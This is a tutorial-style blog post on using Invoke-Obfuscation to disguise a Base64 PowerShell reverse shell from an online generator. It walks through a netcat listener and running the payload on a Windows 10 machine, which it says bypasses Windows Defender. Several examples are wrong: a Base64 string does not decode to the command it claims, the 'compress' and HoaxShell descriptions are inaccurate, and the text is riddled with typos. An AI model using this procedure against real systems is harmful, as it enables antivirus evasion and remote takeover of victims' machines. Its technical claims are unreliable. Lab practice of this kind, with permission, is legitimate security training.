An Easy Guide to Obfuscating PowerShell Scripts with Invoke-Obfuscation

In cybersecurity, obfuscation is important for hiding scripts from detection and analysis. Obfuscation means making code hard to understand. This can include renaming variables, changing the structure of the code, and other techniques to make it difficult for attackers to figure out or detect harmful scripts. Invoke-Obfuscation is a free tool that helps you make your PowerShell code harder to detect and analyze by applying these obfuscation techniques. This guide explains how to use Invoke-Obfuscation. This guide is for educational purposes only.

Step 1: Check the machine’s IP

Kali Linux: ip a
Windows 10: ipconfig

1. Verify the connection between machines using the ping command:

· Ping from Windows 10 to Kali Linux should work.

· Ping from Kali Linux to Windows 10 might fail due to Windows firewall.

Step 2: Installing PowerShell on Kali Linux.

1. Update the System:

sudo apt update

2. Installing PowerShell

sudo apt install -y powershell

Step 3: Downloading Invoke-Obfuscation from GitHub.

git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

Step 4: Prepare Invoke-Obfuscation.

1. List the folder content:

ls

2. Navigate to the downloaded project directory:

cd Invoke-Obfuscation

3. Set permissions:

chmod 777 *

Step 5: Running PowerShell and Loading the Script.

1. Chang to the root user:

sudo su

2. Start PowerShell :

pwsh

3. Check the current execution policy:

Get-ExecutionPolicy

· If the output is “Unrestricted,” can proceed with running and obfuscating PowerShell scripts using Invoke-Obfuscation without encountering execution policy-related issues.

4. List the folder content:

ls

5. Importing the Invoke-Obfuscation module:

Import-Module ./Invoke-Obfuscation.psd1

6. Run the Invoke-Obfuscation model:

Invoke-Obfuscation

7. View module options (equivalent to help):

tutorials

8. Usage Guide for Invoke-Obfuscatio

1. Load a script block (SET SCRIPTBLOCK) or script path/URL (SET SCRIPTPATH):

SET SCRIPTBLOCK Write-Host “This is my test command” -ForegroundColor Green

2. Navigate through obfuscation menus:

- Yellow options enable obfuscation.

- Use BACK/CD .. to return to the previous menu and HOME/MAIN to return to the main menu.

- For example, enter ENCODING and then 5 to apply SecureString obfuscation.

3. Test the obfuscated command locally:

- Enter SHOW to view the current obfuscated command.

4. Copy the obfuscated command to your clipboard:

- Enter OUT to write the obfuscated command to disk.

5. Reset to remove all obfuscations and start over:

- Enter UNDO to undo the last obfuscation.

• Enter HELP/? for the help menu.

Step 6: Choosing a Reverse Shell and Testing Obfuscation

1. Opening on the Kali machine a web browser and entering the Shell Generator website:

https://www.revshells.com

Entering the Shell Generator website:

2. On The top left side there is an option for IP & Port:

Enter the attacker’s (Kali) IP address and choose the attack port.

3. On the bottom there is a tab menu of types of payloads that can be used :

Reverse

· Reverse:

Reverse shell is a type of shell where the target machine connects back to the attacker’s machine, allowing the attacker to gain control over the target system. This method is useful when the target machine is behind a firewall or NAT, making it difficult to connect directly.

· Bind:

In a bind shell, the target machine opens a specific port and listens for incoming connections from the attacker. The attacker then connects to this port to gain control over the target machine. This method can be less stealthy than a reverse shell, as it requires the target to have an open port.

· MSFVenom:

A tool used to generate payloads for use with the Metasploit Framework. MSFVenom allows the creation of various types of payloads, including reverse and bind shells and customizing them for different platforms and architectures. This provides options for generating payloads compatible with Metasploit.

· HoaxShell:

Hoax shells is used to simulate a shell for testing purposes or to deceive an attacker. It can mimic the behavior of a real shell but is designed to log activities or redirect commands for analysis without providing full control to the attacker.

4. OS Mene

Under the main menu of payloads, there is an option to choose what kind of operating system to attack:

Will live it on the default option : All

5. Shell payloads scrip

Under the OS there is a scroll-down menu type of different reverse shell payloads scrip available in the Reverse Shell Generator:

Will use: PowerShell#3 (Base64)

PowerShell Base64 Reverse Shell: This technique involves encoding the PowerShell script in Base64 to obfuscate the command and make it less likely to be detected by security software.

· When choosing this option will see a window that shows a Base64-encoded PowerShell command which is designed to run a reverse shell. The encoded command can be executed on a target machine to establish a connection back to the attacker’s machine.

6. Copy the generated script by selecting the Copy button in the bottom right corner.

7. Return to the Kali terminal Tab that is running Invoke-Obfuscation and load the script block (SET SCRIPTBLOCK) from the Reverse Shell Generator:

set scriptblock <Copyed Script>

Press Enter.

· After it will finance, press Enter, If the obfuscation is successful, there will display a message:

Successfully set ScriptBlock

Step 7: Obfuscation Options in Invoke-Obfuscation

1. Select: AST

· TOKEN:

Obfuscates PowerShell commands using Tokens.

- Example:

Write-Host “Hello, World!”

Can become:

(&{wri`te-h`os`t} “Hello, World!”)

· AST:

Obfuscates Nodes of AST in PowerShell (PS5.0).

- Example:

Write-Host “Hello, World!”

Can transform to another AST structure yielding the same result but entirely different in the original code.

· STRING:

Obfuscates the entire command as a String.

- Example:

Write-Host “Hello, World!”

Can become: [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(“VwByAGkAdABlAC0ASABvAHMAdAAgACIAUgBlAGwAbwBsAGkAawBtIgA=”))

· ENCODING:

Obfuscates the entire command using Encoding.

- Example:

Write-Host “Hello, World!”

Can become:

powershell -e “VwByAGkAdABlAC0ASABvAHMAdAAgACIAUgBlAGwAbwBsAGkAawBtIgA=”

· COMPRESS:

Converts the entire command to a one-liner and compresses it.

- Example:

Write-Host “Hello, World!”

Can become:

$z=”Hello, World!”;Write-Host $z

· LAUNCHER:

Obfuscates command parameters using Launcher techniques.

- Example:

Write-Host “Hello, World!”

Can become:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command “Write-Host ‘Hello, World!’”

2. Apply all obfuscation techniques:

Select: ALL

· This option is suitable when you want to make the code as hard to understand and analyze as possible.

· The tool will apply all possible obfuscation techniques to the current code structure.

- NamedAttributeArgumentAst: Obfuscates Nodes of type NamedAttributeArgumentAst.

- ParamBlockAst: Obfuscates Nodes of type ParamBlockAst.

- ScriptBlockAst: Obfuscates Nodes of type ScriptBlockAst.

- AttributeAst: Obfuscates Nodes of type AttributeAst.

- BinaryExpressionAst: Obfuscates Nodes of type BinaryExpressionAst.

- HashtableAst: Obfuscates Nodes of type HashtableAst.

- CommandAst: Obfuscates Nodes of type CommandAst.

- AssignmentStatementAst: Obfuscates Nodes of type AssignmentStatementAst.

- TypeExpressionAst: Obfuscates Nodes of type TypeExpressionAst.

- TypeConstraintAst: Obfuscates Nodes of type TypeConstraintAst.

- ALL: Selects all of the above options for maximum obfuscation.

3. Choose one of the below AST\All options to APPLY to the current payload

Select: 1

Will get the result that Invoke-Obfuscation\AST\All was exsiccated

4. Testing

test

The results show that there was an Invoking

The error message is because the script is a Reverse Shall between 2 machines and we still haven’t executed it, just tested it.

Step 8: Final Steps

1. Set up a Netcat listener:

Open a new terminal window in Kali and run:

nc -lvnp 9001

nc: Short for Netcat, a networking utility for reading from and writing to network connections using TCP or UDP.

- l: Tells Netcat to listen for an incoming connection rather than initiating a connection to a remote host.

- v: Enables verbose mode, providing detailed output about the connection process.

- n: Prevents Netcat from doing DNS lookups on the IP addresses, which speeds up the connection process.

- p 9001: Specifies the port number (9001) on which Netcat should listen for incoming connections.

2. In the Invoke-Obfuscation window on the Kali machine:

copy the obfuscated script.

3. Open PowerShell on the Windows machine and paste the obfuscated script.

On the right Kali Terminal, we can see that there is a compaction to the Windows machine, which allows Revers Sale communication.

4. Verifying the connection to the Windows machine by typing at the Kali terminal:

dir

The code bypassed the Windows Defender and connected the attacker to the Windows machine.

Conclusion

By following this guide, you can use Invoke-Obfuscation to hide your PowerShell scripts. This makes them more secure and helps you learn how to handle real-world obfuscation. This guide is for learning only. Using these techniques for bad purposes is illegal and wrong. Always get permission before using any cybersecurity tools or methods.

Invoke-Obfuscation offers various methods to make your scripts difficult to read and analyze. Whether you’re using it for educational purposes or in a professional setting, understanding these techniques can enhance your cybersecurity skills and knowledge. Practicing with these tools in a controlled environment can prepare you for real-world scenarios, ensuring you are well-equipped to secure your systems and networks.